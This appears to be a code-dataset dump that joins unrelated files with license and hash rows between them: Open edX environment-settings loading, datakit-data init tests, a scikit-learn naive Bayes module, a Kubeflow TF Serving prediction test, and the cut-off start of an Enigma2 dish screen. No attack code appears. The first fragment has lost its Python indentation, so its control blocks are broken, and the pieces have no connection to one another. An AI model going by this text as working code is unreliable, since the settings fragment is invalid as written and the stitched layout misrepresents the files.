SESSION_INACTIVITY_TIMEOUT_IN_SECONDS = None
EMAIL_FILE_PATH = None
STATIC_URL_BASE = None
STATIC_ROOT_BASE = None
SESSION_COOKIE_NAME = None
ADDL_INSTALLED_APPS = []
AUTH_USE_CAS = False
CAS_ATTRIBUTE_CALLBACK = None
MICROSITE_ROOT_DIR = ''
CMS_SEGMENT_KEY = None
DATADOG = {}
ADDL_INSTALLED_APPS = []
LOCAL_LOGLEVEL = 'INFO'
##############################################################
#
# ENV TOKEN IMPORT
#
# Currently non-secure and secure settings are managed
# in two yaml files. This section imports the non-secure
# settings and modifies them in code if necessary.
#
with open(CONFIG_ROOT / CONFIG_PREFIX + "env.yaml") as env_file:
ENV_TOKENS = yaml.safe_load(env_file)
ENV_TOKENS = convert_tokens(ENV_TOKENS)
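# For illustration only (added; keys and values are deployment-specific
# assumptions): the env.yaml file read above is a flat YAML mapping whose keys
# become module-level settings, e.g.
#   FEATURES:
#     CUSTOM_COURSES_EDX: false
#   STATIC_URL_BASE: "/static/"
#   CELERY_BROKER_HOSTNAME: "localhost"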
##############################################################
#
# DEFAULT SETTINGS FOR CELERY
#
# Don't use a connection pool, since connections are dropped by ELB.
BROKER_POOL_LIMIT = 0
BROKER_CONNECTION_TIMEOUT = 1
# For the Result Store, use the django cache named 'celery'
CELERY_RESULT_BACKEND = 'djcelery.backends.cache:CacheBackend'
# When the broker is behind an ELB, use a heartbeat to refresh the
# connection and to detect if it has been dropped.
BROKER_HEARTBEAT = 10.0
BROKER_HEARTBEAT_CHECKRATE = 2
# Each worker should only fetch one message at a time
CELERYD_PREFETCH_MULTIPLIER = 1
# Rename the exchange and queues for each variant
QUEUE_VARIANT = CONFIG_PREFIX.lower()
CELERY_DEFAULT_EXCHANGE = 'edx.{0}core'.format(QUEUE_VARIANT)
HIGH_PRIORITY_QUEUE = 'edx.{0}core.high'.format(QUEUE_VARIANT)
DEFAULT_PRIORITY_QUEUE = 'edx.{0}core.default'.format(QUEUE_VARIANT)
LOW_PRIORITY_QUEUE = 'edx.{0}core.low'.format(QUEUE_VARIANT)
CELERY_DEFAULT_QUEUE = DEFAULT_PRIORITY_QUEUE
CELERY_DEFAULT_ROUTING_KEY = DEFAULT_PRIORITY_QUEUE
ENV_CELERY_QUEUES = ENV_TOKENS.get('CELERY_QUEUES', None)
if ENV_CELERY_QUEUES:
CELERY_QUEUES = {queue: {} for queue in ENV_CELERY_QUEUES}
else:
CELERY_QUEUES = {
HIGH_PRIORITY_QUEUE: {},
LOW_PRIORITY_QUEUE: {},
DEFAULT_PRIORITY_QUEUE: {}
}
CELERY_ALWAYS_EAGER = False
##########################################
# Merge settings from common.py
#
# Before the tokens are imported directly
# into settings some dictionary settings
# need to be merged from common.py
ENV_FEATURES = ENV_TOKENS.get('FEATURES', {})
for feature, value in ENV_FEATURES.items():
FEATURES[feature] = value
# Delete keys from ENV_TOKENS so that when it's imported
# into settings it doesn't override what was set above
if 'FEATURES' in ENV_TOKENS:
del ENV_TOKENS['FEATURES']
vars().update(ENV_TOKENS)
##########################################
# Manipulate imported settings with code
#
# For historical reasons some settings need
# to be modified in code. For example
# conversions to other data structures that
# cannot be represented in YAML.
if STATIC_URL_BASE:
# collectstatic will fail if STATIC_URL is a unicode string
STATIC_URL = STATIC_URL_BASE.encode('ascii')
if not STATIC_URL.endswith("/"):
STATIC_URL += "/"
STATIC_URL += EDX_PLATFORM_REVISION + "/"
if STATIC_ROOT_BASE:
STATIC_ROOT = path(STATIC_ROOT_BASE) / EDX_PLATFORM_REVISION
# Cache used for location mapping -- called many times with the same key/value
# in a given request.
if 'loc_cache' not in CACHES:
CACHES['loc_cache'] = {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'edx_location_mem_cache',
}
# allow for environments to specify what cookie name our login subsystem should use
# this is to fix a bug regarding simultaneous logins between edx.org and edge.edx.org which can
# happen with some browsers (e.g. Firefox)
if SESSION_COOKIE_NAME:
# NOTE, there's a bug in Django (http://bugs.python.org/issue18012) which necessitates this being a str()
SESSION_COOKIE_NAME = str(SESSION_COOKIE_NAME)
# Additional installed apps
for app in ADDL_INSTALLED_APPS:
INSTALLED_APPS += (app,)
LOGGING = get_logger_config(LOG_DIR,
local_loglevel=LOCAL_LOGLEVEL,
logging_env=LOGGING_ENV,
debug=False,
service_variant=SERVICE_VARIANT)
if AUTH_USE_CAS:
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'django_cas.backends.CASBackend',
)
INSTALLED_APPS += ('django_cas',)
MIDDLEWARE_CLASSES += ('django_cas.middleware.CASMiddleware',)
if CAS_ATTRIBUTE_CALLBACK:
import importlib
CAS_USER_DETAILS_RESOLVER = getattr(
importlib.import_module(CAS_ATTRIBUTE_CALLBACK['module']),
CAS_ATTRIBUTE_CALLBACK['function']
)
MICROSITE_ROOT_DIR = path(MICROSITE_ROOT_DIR)
##############################################################
#
# AUTH TOKEN IMPORT
#
with open(CONFIG_ROOT / CONFIG_PREFIX + "auth.yaml") as auth_file:
AUTH_TOKENS = yaml.safe_load(auth_file)
AUTH_TOKENS = convert_tokens(AUTH_TOKENS)
vars().update(AUTH_TOKENS)
##########################################
# Manipulate imported settings with code
#
if AWS_ACCESS_KEY_ID == "":
AWS_ACCESS_KEY_ID = None
if AWS_SECRET_ACCESS_KEY == "":
AWS_SECRET_ACCESS_KEY = None
MODULESTORE = convert_module_store_setting_if_needed(MODULESTORE)
# TODO: deprecated (compatibility with previous settings)
if 'DATADOG_API' in AUTH_TOKENS:
DATADOG['api_key'] = AUTH_TOKENS['DATADOG_API']
BROKER_URL = "{0}://{1}:{2}@{3}/{4}".format(CELERY_BROKER_TRANSPORT,
CELERY_BROKER_USER,
CELERY_BROKER_PASSWORD,
CELERY_BROKER_HOSTNAME,
CELERY_BROKER_VHOST)
BROKER_USE_SSL = ENV_TOKENS.get('CELERY_BROKER_USE_SSL', False)
######################## CUSTOM COURSES for EDX CONNECTOR ######################
if FEATURES.get('CUSTOM_COURSES_EDX'):
INSTALLED_APPS += ('openedx.core.djangoapps.ccxcon',)
| agpl-3.0 | 4,286,653,009,028,260,400 | 31.135135 | 109 | 0.66971 | false |
associatedpress/datakit-data | tests/commands/test_init.py | 1 | 4495 | import os
from unittest import mock
from conftest import (
create_plugin_config,
create_project_config,
dir_contents
)
from datakit.utils import read_json
from datakit_data import Init
def test_project_buildout(caplog, fake_project, monkeypatch, tmpdir):
"""
Init should auto-generate directories and project-level config file.
"""
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
contents = dir_contents(tmpdir.strpath)
assert 'data' in contents
assert 'config' in contents
assert os.path.exists(os.path.join(fake_project, 'data/.gitkeep'))
assert 'Initializing project' in caplog.text
# Test default configs initialized
assert cmd.project_configs['aws_user_profile'] == 'default'
assert cmd.project_configs['s3_bucket'] == ''
assert cmd.project_configs['s3_path'] == 'fake-project'
# Test default configs initialized
project_configs = read_json(cmd.project_config_path)
assert project_configs['aws_user_profile'] == 'default'
assert project_configs['s3_bucket'] == ''
assert project_configs['s3_path'] == 'fake-project'
def test_plugin_configs_not_initialized(dkit_home):
"""
Init should NOT auto-generate plugin-level configurations.
"""
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
# Guard against auto-generation of plugin-level configs
assert not os.path.exists(cmd.plugin_config_path)
def test_inherit_plugin_level_configs(dkit_home, fake_project):
"""
Plugin-level default configs should override project-level defaults
"""
# Create global plugin configs, which should override project defaults
plugin_configs = {
's3_bucket': 'data.ap.org',
's3_path': '',
'aws_user_profile': 'ap'
}
create_plugin_config(dkit_home, 'datakit-data', plugin_configs)
    # Initialize project
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
assert cmd.project_configs == plugin_configs
assert 'datakit-data' in dir_contents(dkit_home)
assert 'fake-project' not in dir_contents(dkit_home)
assert os.path.exists(cmd.plugin_config_path)
def test_s3_path_prefix(dkit_home, fake_project):
plugin_configs = {
's3_bucket': 'data.ap.org',
's3_path_prefix': 'projects/2017',
'aws_user_profile': 'ap'
}
create_plugin_config(dkit_home, 'datakit-data', plugin_configs)
    # Initialize project
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
assert cmd.project_configs['s3_path'] == 'projects/2017/fake-project'
assert 's3_path_prefix' not in cmd.project_configs
def test_s3_path_suffix(dkit_home, fake_project):
plugin_configs = {
's3_bucket': 'data.ap.org',
's3_path_suffix': 'data',
'aws_user_profile': 'ap'
}
create_plugin_config(dkit_home, 'datakit-data', plugin_configs)
    # Initialize project
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
assert cmd.project_configs['s3_path'] == 'fake-project/data'
assert 's3_path_suffix' not in cmd.project_configs
def test_s3_path_prefix_and_suffix(dkit_home, fake_project):
plugin_configs = {
's3_bucket': 'data.ap.org',
's3_path_prefix': 'projects/2017',
's3_path_suffix': 'data',
'aws_user_profile': 'ap'
}
create_plugin_config(dkit_home, 'datakit-data', plugin_configs)
    # Initialize project
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
assert cmd.project_configs['s3_path'] == 'projects/2017/fake-project/data'
assert 's3_path_prefix' not in cmd.project_configs
assert 's3_path_suffix' not in cmd.project_configs
def test_preexisting_project_configs_honored(fake_project):
"""
Subsequent initializations should not overwrite a pre-existing project config.
"""
# Mimic a prior initialization by pre-creating the config file
create_project_config(fake_project, {'aws_user_profile': 'user2'})
cmd = Init(None, None, cmd_name='data init')
parsed_args = mock.Mock()
cmd.run(parsed_args)
proj_configs = cmd.project_configs
assert proj_configs['aws_user_profile'] == 'user2'
assert 's3_bucket' not in proj_configs
assert 's3_path' not in proj_configs
| isc | 392,055,649,879,973,000 | 33.576923 | 82 | 0.668966 | false |
Sklearn-HMM/scikit-learn-HMM | sklean-hmm/naive_bayes.py | 3 | 20231 | # -*- coding: utf-8 -*-
"""
The :mod:`sklearn.naive_bayes` module implements Naive Bayes algorithms. These
are supervised learning methods based on applying Bayes' theorem with strong
(naive) feature independence assumptions.
"""
# Author: Vincent Michel <[email protected]>
# Minor fixes by Fabian Pedregosa
# Amit Aides <[email protected]>
# Yehuda Finkelstein <[email protected]>
# Lars Buitinck <[email protected]>
# (parts based on earlier work by Mathieu Blondel)
#
# License: BSD 3 clause
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import issparse
import warnings
from .base import BaseEstimator, ClassifierMixin
from .preprocessing import binarize
from .preprocessing import LabelBinarizer
from .preprocessing import label_binarize
from .utils import array2d, atleast2d_or_csr, column_or_1d, check_arrays
from .utils.extmath import safe_sparse_dot, logsumexp
from .utils.multiclass import _check_partial_fit_first_call
from .externals import six
__all__ = ['BernoulliNB', 'GaussianNB', 'MultinomialNB']
class BaseNB(six.with_metaclass(ABCMeta, BaseEstimator, ClassifierMixin)):
"""Abstract base class for naive Bayes estimators"""
@abstractmethod
def _joint_log_likelihood(self, X):
"""Compute the unnormalized posterior log probability of X
I.e. ``log P(c) + log P(x|c)`` for all rows x of X, as an array-like of
shape [n_classes, n_samples].
Input is passed to _joint_log_likelihood as-is by predict,
predict_proba and predict_log_proba.
"""
def predict(self, X):
"""
Perform classification on an array of test vectors X.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array, shape = [n_samples]
Predicted target values for X
"""
jll = self._joint_log_likelihood(X)
return self.classes_[np.argmax(jll, axis=1)]
def predict_log_proba(self, X):
"""
Return log-probability estimates for the test vector X.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array-like, shape = [n_samples, n_classes]
Returns the log-probability of the sample for each class
in the model, where classes are ordered arithmetically.
"""
jll = self._joint_log_likelihood(X)
# normalize by P(x) = P(f_1, ..., f_n)
log_prob_x = logsumexp(jll, axis=1)
return jll - np.atleast_2d(log_prob_x).T
def predict_proba(self, X):
"""
Return probability estimates for the test vector X.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array-like, shape = [n_samples, n_classes]
Returns the probability of the sample for each class in
the model, where classes are ordered arithmetically.
"""
return np.exp(self.predict_log_proba(X))
class GaussianNB(BaseNB):
"""
Gaussian Naive Bayes (GaussianNB)
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target vector relative to X
Attributes
----------
`class_prior_` : array, shape = [n_classes]
probability of each class.
`theta_` : array, shape = [n_classes, n_features]
mean of each feature per class
`sigma_` : array, shape = [n_classes, n_features]
variance of each feature per class
Examples
--------
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> Y = np.array([1, 1, 1, 2, 2, 2])
>>> from sklearn.naive_bayes import GaussianNB
>>> clf = GaussianNB()
>>> clf.fit(X, Y)
GaussianNB()
>>> print(clf.predict([[-0.8, -1]]))
[1]
"""
def fit(self, X, y):
"""Fit Gaussian Naive Bayes according to X, y
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
Returns
-------
self : object
Returns self.
"""
X, y = check_arrays(X, y, sparse_format='dense')
y = column_or_1d(y, warn=True)
n_samples, n_features = X.shape
self.classes_ = unique_y = np.unique(y)
n_classes = unique_y.shape[0]
self.theta_ = np.zeros((n_classes, n_features))
self.sigma_ = np.zeros((n_classes, n_features))
self.class_prior_ = np.zeros(n_classes)
epsilon = 1e-9
for i, y_i in enumerate(unique_y):
Xi = X[y == y_i, :]
self.theta_[i, :] = np.mean(Xi, axis=0)
self.sigma_[i, :] = np.var(Xi, axis=0) + epsilon
self.class_prior_[i] = np.float(Xi.shape[0]) / n_samples
return self
def _joint_log_likelihood(self, X):
X = array2d(X)
joint_log_likelihood = []
for i in range(np.size(self.classes_)):
jointi = np.log(self.class_prior_[i])
n_ij = - 0.5 * np.sum(np.log(np.pi * self.sigma_[i, :]))
n_ij -= 0.5 * np.sum(((X - self.theta_[i, :]) ** 2) /
(self.sigma_[i, :]), 1)
joint_log_likelihood.append(jointi + n_ij)
joint_log_likelihood = np.array(joint_log_likelihood).T
return joint_log_likelihood
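# For reference (added): the per-class score computed above is
#   log P(c) - 0.5 * sum_j log(pi * sigma_[c, j])
#            - 0.5 * sum_j (x_j - theta_[c, j])**2 / sigma_[c, j]
# i.e. a per-feature Gaussian log-density (up to an additive constant that is
# identical for every class) plus the class log prior.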
class BaseDiscreteNB(BaseNB):
"""Abstract base class for naive Bayes on discrete/categorical data
Any estimator based on this class should provide:
__init__
_joint_log_likelihood(X) as per BaseNB
"""
def _update_class_log_prior(self, class_prior=None):
n_classes = len(self.classes_)
if class_prior is not None:
if len(class_prior) != n_classes:
raise ValueError("Number of priors must match number of"
" classes.")
self.class_log_prior_ = np.log(class_prior)
elif self.fit_prior:
# empirical prior, with sample_weight taken into account
self.class_log_prior_ = (np.log(self.class_count_)
- np.log(self.class_count_.sum()))
else:
self.class_log_prior_ = np.zeros(n_classes) - np.log(n_classes)
def partial_fit(self, X, y, classes=None, sample_weight=None):
"""Incremental fit on a batch of samples.
This method is expected to be called several times consecutively
on different chunks of a dataset so as to implement out-of-core
or online learning.
This is especially useful when the whole dataset is too big to fit in
memory at once.
This method has some performance overhead hence it is better to call
partial_fit on chunks of data that are as large as possible
(as long as fitting in the memory budget) to hide the overhead.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
classes : array-like, shape = [n_classes]
List of all the classes that can possibly appear in the y vector.
Must be provided at the first call to partial_fit, can be omitted
in subsequent calls.
sample_weight : array-like, shape = [n_samples], optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : object
Returns self.
"""
X = atleast2d_or_csr(X, dtype=np.float64)
_, n_features = X.shape
if _check_partial_fit_first_call(self, classes):
# This is the first call to partial_fit:
# initialize various cumulative counters
n_effective_classes = len(classes) if len(classes) > 1 else 2
self.class_count_ = np.zeros(n_effective_classes, dtype=np.float64)
self.feature_count_ = np.zeros((n_effective_classes, n_features),
dtype=np.float64)
Y = label_binarize(y, classes=self.classes_)
if Y.shape[1] == 1:
Y = np.concatenate((1 - Y, Y), axis=1)
n_samples, n_classes = Y.shape
if X.shape[0] != Y.shape[0]:
msg = "X.shape[0]=%d and y.shape[0]=%d are incompatible."
raise ValueError(msg % (X.shape[0], y.shape[0]))
# convert to float to support sample weight consistently
Y = Y.astype(np.float64)
if sample_weight is not None:
Y *= array2d(sample_weight).T
# Count raw events from data before updating the class log prior
# and feature log probas
self._count(X, Y)
# XXX: OPTIM: we could introduce a public finalization method to
# be called by the user explicitly just once after several consecutive
# calls to partial_fit and prior any call to predict[_[log_]proba]
# to avoid computing the smooth log probas at each call to partial fit
self._update_feature_log_prob()
self._update_class_log_prior()
return self
def fit(self, X, y, sample_weight=None, class_prior=None):
"""Fit Naive Bayes classifier according to X, y
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
sample_weight : array-like, shape = [n_samples], optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : object
Returns self.
"""
X, y = check_arrays(X, y, sparse_format='csr')
X = X.astype(np.float)
y = column_or_1d(y, warn=True)
_, n_features = X.shape
labelbin = LabelBinarizer()
Y = labelbin.fit_transform(y)
self.classes_ = labelbin.classes_
if Y.shape[1] == 1:
Y = np.concatenate((1 - Y, Y), axis=1)
# convert to float to support sample weight consistently
Y = Y.astype(np.float64)
if sample_weight is not None:
Y *= array2d(sample_weight).T
if class_prior is not None:
warnings.warn('class_prior has been made an ``__init__`` parameter'
' and will be removed from fit in version 0.15.',
DeprecationWarning)
else:
class_prior = self.class_prior
# Count raw events from data before updating the class log prior
# and feature log probas
n_effective_classes = Y.shape[1]
self.class_count_ = np.zeros(n_effective_classes, dtype=np.float64)
self.feature_count_ = np.zeros((n_effective_classes, n_features),
dtype=np.float64)
self._count(X, Y)
self._update_feature_log_prob()
self._update_class_log_prior(class_prior=class_prior)
return self
# XXX The following is a stopgap measure; we need to set the dimensions
# of class_log_prior_ and feature_log_prob_ correctly.
def _get_coef(self):
return (self.feature_log_prob_[1:]
if len(self.classes_) == 2 else self.feature_log_prob_)
def _get_intercept(self):
return (self.class_log_prior_[1:]
if len(self.classes_) == 2 else self.class_log_prior_)
coef_ = property(_get_coef)
intercept_ = property(_get_intercept)
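# Minimal out-of-core sketch for the partial_fit API documented above (added
# for illustration; `chunks` and the class list are placeholders):
#   clf = MultinomialNB()
#   all_classes = [0, 1]
#   for X_chunk, y_chunk in chunks:
#       clf.partial_fit(X_chunk, y_chunk, classes=all_classes)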
class MultinomialNB(BaseDiscreteNB):
"""
Naive Bayes classifier for multinomial models
The multinomial Naive Bayes classifier is suitable for classification with
discrete features (e.g., word counts for text classification). The
multinomial distribution normally requires integer feature counts. However,
in practice, fractional counts such as tf-idf may also work.
Parameters
----------
alpha : float, optional (default=1.0)
Additive (Laplace/Lidstone) smoothing parameter
(0 for no smoothing).
fit_prior : boolean
Whether to learn class prior probabilities or not.
If false, a uniform prior will be used.
class_prior : array-like, size (n_classes,)
Prior probabilities of the classes. If specified the priors are not
adjusted according to the data.
Attributes
----------
`class_log_prior_` : array, shape (n_classes, )
Smoothed empirical log probability for each class.
`intercept_` : property
Mirrors ``class_log_prior_`` for interpreting MultinomialNB
as a linear model.
`feature_log_prob_`: array, shape (n_classes, n_features)
Empirical log probability of features
given a class, ``P(x_i|y)``.
`coef_` : property
Mirrors ``feature_log_prob_`` for interpreting MultinomialNB
as a linear model.
`class_count_` : array, shape (n_classes,)
Number of samples encountered for each class during fitting. This
value is weighted by the sample weight when provided.
`feature_count_` : array, shape (n_classes, n_features)
Number of samples encountered for each (class, feature)
during fitting. This value is weighted by the sample weight when
provided.
Examples
--------
>>> import numpy as np
>>> X = np.random.randint(5, size=(6, 100))
>>> y = np.array([1, 2, 3, 4, 5, 6])
>>> from sklearn.naive_bayes import MultinomialNB
>>> clf = MultinomialNB()
>>> clf.fit(X, y)
MultinomialNB(alpha=1.0, class_prior=None, fit_prior=True)
>>> print(clf.predict(X[2]))
[3]
Notes
-----
For the rationale behind the names `coef_` and `intercept_`, i.e.
naive Bayes as a linear classifier, see J. Rennie et al. (2003),
Tackling the poor assumptions of naive Bayes text classifiers, ICML.
References
----------
C.D. Manning, P. Raghavan and H. Schuetze (2008). Introduction to
Information Retrieval. Cambridge University Press, pp. 234-265.
http://nlp.stanford.edu/IR-book/html/htmledition/
naive-bayes-text-classification-1.html
"""
def __init__(self, alpha=1.0, fit_prior=True, class_prior=None):
self.alpha = alpha
self.fit_prior = fit_prior
self.class_prior = class_prior
def _count(self, X, Y):
"""Count and smooth feature occurrences."""
if np.any((X.data if issparse(X) else X) < 0):
raise ValueError("Input X must be non-negative")
self.feature_count_ += safe_sparse_dot(Y.T, X)
self.class_count_ += Y.sum(axis=0)
def _update_feature_log_prob(self):
"""Apply smoothing to raw counts and recompute log probabilities"""
smoothed_fc = self.feature_count_ + self.alpha
smoothed_cc = smoothed_fc.sum(axis=1)
self.feature_log_prob_ = (np.log(smoothed_fc)
- np.log(smoothed_cc.reshape(-1, 1)))
def _joint_log_likelihood(self, X):
"""Calculate the posterior log probability of the samples X"""
X = atleast2d_or_csr(X)
return (safe_sparse_dot(X, self.feature_log_prob_.T)
+ self.class_log_prior_)
class BernoulliNB(BaseDiscreteNB):
"""Naive Bayes classifier for multivariate Bernoulli models.
Like MultinomialNB, this classifier is suitable for discrete data. The
difference is that while MultinomialNB works with occurrence counts,
BernoulliNB is designed for binary/boolean features.
Parameters
----------
alpha : float, optional (default=1.0)
Additive (Laplace/Lidstone) smoothing parameter
(0 for no smoothing).
binarize : float or None, optional
Threshold for binarizing (mapping to booleans) of sample features.
If None, input is presumed to already consist of binary vectors.
fit_prior : boolean
Whether to learn class prior probabilities or not.
If false, a uniform prior will be used.
class_prior : array-like, size=[n_classes,]
Prior probabilities of the classes. If specified the priors are not
adjusted according to the data.
Attributes
----------
`class_log_prior_` : array, shape = [n_classes]
Log probability of each class (smoothed).
`feature_log_prob_` : array, shape = [n_classes, n_features]
Empirical log probability of features given a class, P(x_i|y).
`class_count_` : array, shape = [n_classes]
Number of samples encountered for each class during fitting. This
value is weighted by the sample weight when provided.
`feature_count_` : array, shape = [n_classes, n_features]
Number of samples encountered for each (class, feature)
during fitting. This value is weighted by the sample weight when
provided.
Examples
--------
>>> import numpy as np
>>> X = np.random.randint(2, size=(6, 100))
>>> Y = np.array([1, 2, 3, 4, 4, 5])
>>> from sklearn.naive_bayes import BernoulliNB
>>> clf = BernoulliNB()
>>> clf.fit(X, Y)
BernoulliNB(alpha=1.0, binarize=0.0, class_prior=None, fit_prior=True)
>>> print(clf.predict(X[2]))
[3]
References
----------
C.D. Manning, P. Raghavan and H. Schuetze (2008). Introduction to
Information Retrieval. Cambridge University Press, pp. 234-265.
http://nlp.stanford.edu/IR-book/html/htmledition/the-bernoulli-model-1.html
A. McCallum and K. Nigam (1998). A comparison of event models for naive
Bayes text classification. Proc. AAAI/ICML-98 Workshop on Learning for
Text Categorization, pp. 41-48.
V. Metsis, I. Androutsopoulos and G. Paliouras (2006). Spam filtering with
naive Bayes -- Which naive Bayes? 3rd Conf. on Email and Anti-Spam (CEAS).
"""
def __init__(self, alpha=1.0, binarize=.0, fit_prior=True,
class_prior=None):
self.alpha = alpha
self.binarize = binarize
self.fit_prior = fit_prior
self.class_prior = class_prior
def _count(self, X, Y):
"""Count and smooth feature occurrences."""
if self.binarize is not None:
X = binarize(X, threshold=self.binarize)
self.feature_count_ += safe_sparse_dot(Y.T, X)
self.class_count_ += Y.sum(axis=0)
def _update_feature_log_prob(self):
"""Apply smoothing to raw counts and recompute log probabilities"""
n_classes = len(self.classes_)
smoothed_fc = self.feature_count_ + self.alpha
smoothed_cc = self.class_count_ + self.alpha * n_classes
self.feature_log_prob_ = (np.log(smoothed_fc)
- np.log(smoothed_cc.reshape(-1, 1)))
def _joint_log_likelihood(self, X):
"""Calculate the posterior log probability of the samples X"""
X = atleast2d_or_csr(X)
if self.binarize is not None:
X = binarize(X, threshold=self.binarize)
n_classes, n_features = self.feature_log_prob_.shape
n_samples, n_features_X = X.shape
if n_features_X != n_features:
raise ValueError("Expected input with %d features, got %d instead"
% (n_features, n_features_X))
neg_prob = np.log(1 - np.exp(self.feature_log_prob_))
# Compute neg_prob · (1 - X).T as ∑neg_prob - X · neg_prob
jll = safe_sparse_dot(X, (self.feature_log_prob_ - neg_prob).T)
jll += self.class_log_prior_ + neg_prob.sum(axis=1)
return jll
| bsd-3-clause | 618,567,034,910,407,600 | 34.485965 | 79 | 0.599743 | false |
kubeflow/kubeflow | testing/test_tf_serving.py | 1 | 4781 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018 The Kubeflow Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import json
import logging
import numbers
import os
import time
from six.moves import xrange
from grpc.beta import implementations
from kubernetes import client as k8s_client
import requests
import tensorflow as tf
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
from kubeflow.testing import test_util
from kubeflow.testing import util
def almost_equal(a, b, tol=0.001):
"""
  Compares two JSON objects (assuming the same structure) with tolerance on numbers.
"""
if isinstance(a, dict):
for key in a.keys():
if not almost_equal(a[key], b[key]):
return False
return True
elif isinstance(a, list):
for i in xrange(len(a)):
if not almost_equal(a[i], b[i]):
return False
return True
elif isinstance(a, numbers.Number):
return abs(a - b) < tol
else:
return a == b
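# Illustration (added; values are arbitrary): nested numbers within the default
# tolerance of 0.001 compare as equal.
#   almost_equal({'predictions': [0.3333]}, {'predictions': [0.3335]}) -> True
#   almost_equal({'predictions': [0.3]}, {'predictions': [0.4]})       -> False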
def main():
parser = argparse.ArgumentParser('Label an image using Inception')
parser.add_argument(
'-p',
'--port',
type=int,
default=9000,
help='Port at which Inception model is being served')
parser.add_argument(
"--namespace", required=True, type=str, help=("The namespace to use."))
parser.add_argument(
"--service_name",
required=True,
type=str,
help=("The TF serving service to use."))
parser.add_argument(
"--artifacts_dir",
default="",
type=str,
help="Directory to use for artifacts that should be preserved after "
"the test runs. Defaults to test_dir if not set.")
parser.add_argument(
"--input_path", required=True, type=str, help=("The input file to use."))
parser.add_argument("--result_path", type=str, help=("The expected result."))
parser.add_argument(
"--workflow_name",
default="tfserving",
type=str,
help="The name of the workflow.")
args = parser.parse_args()
t = test_util.TestCase()
t.class_name = "Kubeflow"
t.name = args.workflow_name + "-" + args.service_name
start = time.time()
util.load_kube_config(persist_config=False)
api_client = k8s_client.ApiClient()
core_api = k8s_client.CoreV1Api(api_client)
try:
with open(args.input_path) as f:
instances = json.loads(f.read())
service = core_api.read_namespaced_service(args.service_name,
args.namespace)
service_ip = service.spec.cluster_ip
model_urls = [
"http://" + service_ip +
":8500/v1/models/mnist:predict", # tf serving's http server
]
for model_url in model_urls:
logging.info("Try predicting with endpoint {}".format(model_url))
num_try = 1
result = None
while True:
try:
result = requests.post(model_url, json=instances)
assert (result.status_code == 200)
except Exception as e:
num_try += 1
if num_try > 10:
raise
logging.info('prediction failed: {}. Retrying...'.format(e))
time.sleep(5)
else:
break
logging.info('Got result: {}'.format(result.text))
if args.result_path:
with open(args.result_path) as f:
expected_result = json.loads(f.read())
logging.info('Expected result: {}'.format(expected_result))
assert (almost_equal(expected_result, json.loads(result.text)))
except Exception as e:
t.failure = "Test failed; " + e.message
raise
finally:
t.time = time.time() - start
junit_path = os.path.join(
args.artifacts_dir,
"junit_kubeflow-tf-serving-image-{}.xml".format(args.service_name))
logging.info("Writing test results to %s", junit_path)
test_util.create_junit_xml_file([t], junit_path)
# Pause to collect Stackdriver logs.
time.sleep(60)
if __name__ == '__main__':
logging.basicConfig(
level=logging.INFO,
format=('%(levelname)s|%(asctime)s'
'|%(pathname)s|%(lineno)d| %(message)s'),
datefmt='%Y-%m-%dT%H:%M:%S',
)
logging.getLogger().setLevel(logging.INFO)
main()
| apache-2.0 | 1,005,149,825,542,019,700 | 29.647436 | 79 | 0.642753 | false |
vit2/vit-e2 | lib/python/Screens/Dish.py | 7 | 8474 | # -*- coding: utf-8 -*-
from Screen import Screen
from Components.BlinkingPixmap import BlinkingPixmapConditional
from Components.Pixmap import Pixmap
from Components.config import config, ConfigInteger
from Components.Sources.Boolean import Boolean
from Components.Label import Label
from Components.ProgressBar import ProgressBar
from Components.ServiceEventTracker import ServiceEventTracker
from enigma import eDVBSatelliteEquipmentControl, eTimer, iPlayableService
from enigma import eServiceCenter, iServiceInformation
from ServiceReference import ServiceReference
INVALID_POSITION = 9999
config.misc.lastrotorposition = ConfigInteger(INVALID_POSITION)
class Dish(Screen):
STATE_HIDDEN = 0
STATE_SHOWN = 1
skin = """
<screen name="Dish" flags="wfNoBorder" position="86,100" size="130,220" title="Dish" zPosition="1" backgroundColor="#11396D" >
<widget name="Dishpixmap" position="0,0" size="130,160" zPosition="-1" pixmap="skin_default/icons/dish.png" transparent="1" alphatest="on" />
